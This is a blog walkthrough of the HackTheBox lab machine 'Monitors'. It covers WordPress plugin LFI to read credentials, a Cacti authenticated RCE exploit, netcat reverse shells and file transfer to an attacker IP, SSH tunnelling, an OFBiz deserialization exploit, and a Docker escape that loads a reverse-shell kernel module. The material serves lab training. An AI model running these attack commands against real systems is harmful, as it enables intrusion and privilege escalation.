Monitors Walkthrough – Hackthebox – Writeup

monitors walkthrough hackthebox writeup

Monitors is an active machine from hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try shortening the walkthrough as much as possible. “Monitors Walkthrough – Hackthebox – Writeup”

Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find best content locker that allows custom message for wordpress. So, I couldn’t password protect this blog post using other methods like root hash, root only readable file contents, etc.

Walkthrough of spectra from hackthebox

Firstly, let’s remove the default routed added by the VPN server.

sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0

Nmap scan

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238 

Enumerate web server

From the nmap results, we have an HTTP server to enumerate.

Direct access isn’t available. So, I added monitos.htb to the /etc/hosts file.

Upon opening with the host name, we get a wordpress website.

Hence, I used wpscan to find the vulnerable plugins.

wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log

We got an unauthenticated file inclusion vulnerability in wp spritz plugin. Thus, I opened the links provided and also opened theburp suite proxy to move further. Then, I hit the request and sent it to intruder and repeater.

As we can see, the LFI worked. Since it’s using file_get_contents function, we cannot execute remote PHP codes. So, I decided to get the credentials from the machine. Hence, I looked for the configuration file of the wordpress.

I noted down the username and password for mysql. Also, I tried the password to log in as the WordPress admin and log in as marcus to SSH but didn’t succeed. Hence, I decided to check the apache configuration.

Reference: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/file-inclusion/lfi-linux-list.md

I did the fuzzing with the list above and found out that in the default configuration file, there is a comment.

Hence, I added the hostname to my hosts file.

Using admin and the password that I found earlier from the wp-config.php file gave me the access to the machine.

The version of the service is 1.2.12 that has an authenticated remote code execution exploit.

Reference: https://www.exploit-db.com/exploits/49810

nc -nlvp 4444

# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444

Finally, I got the foothold.

Get user’s shell

First thing, you want to do is make the shell interactive. Otherwise, you are going to regret later. I looked for some stuff manually, but didn’t find anything. Hence, I decided to download the linux enumeration scripts like linpeas, linenum, pspy, etc. However, both wget and curl aren’t installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows in my local machine.

nc -nlvp 5555 < linpeas.sh 

On the target, I did the following.

cd /tmp
nc 10.10.14.60 5555 > linpeas.sh

I repeated the same for other binaries too and ran the scripts. However, it didn’t give me anything. Then, I searched all files owned by another user and I didn’t find anything. However, when I looked at the home directory of marcus, there is a directory .backup that has unusual permissions. So, I searched for the word marcus in the files of different directories that didn’t have binaries.

grep 'marcus' /etc -R 2>/dev/null

So, I looked at the content of the file.

cat /home/marcus/.backup/backup.sh

I got a password that could give me the SSH access to the user marcus.

Get root access

There is a note which refers about docker. So, I listed down the listening ports.

Hence, I did the SSH tunneling of the port.

ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 marcus@monitors.htb

The version has a exploit related to deserialization.

https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/

Next, I used python to create another reverse shell on my local machine. That would allow me to make the shell more interactive using stty.

Now, we are into the docker container. After this, we have to breakout from the container to the host.

cpash --print

The capability cap_sys_module would allow us to breakout from the container.

Reference: https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd

Following the guide, I copied the source code to get a reverse shell. I changed the IP and the port so that I would listen on the host. For that, I first copied the code to my local machine, edited it and then copied it to the container ‘/’ path.

Then, I created the Makefile.

Then, I made the kernel module.

make

It didn’t work. So, I copied the two files to ‘/’ of the container Then, added the gcc library to the path.

mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make

It was succeeded and I could see some new files on the directory. Then, I listened on the port 4445 of the host machine with the SSH login.

nc -nlvp 4445

Lastly, I executed the exploit on the docker container.

insmod reverse-shell.ko

This might not work because you might be working on the shared environment. So, reset your machine and repeat the steps and voila.

I got the root shell from the monitors host.

Monitors Walkthrough – Hackthebox – Writeup
0 0 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Scroll to top

AdBlock Detected


I am sorry for the popup but it costs me money and time to write these posts.
Please disable the adblocker to proceed.
If you are a regular visitor, you can buymeacoffee too. 😉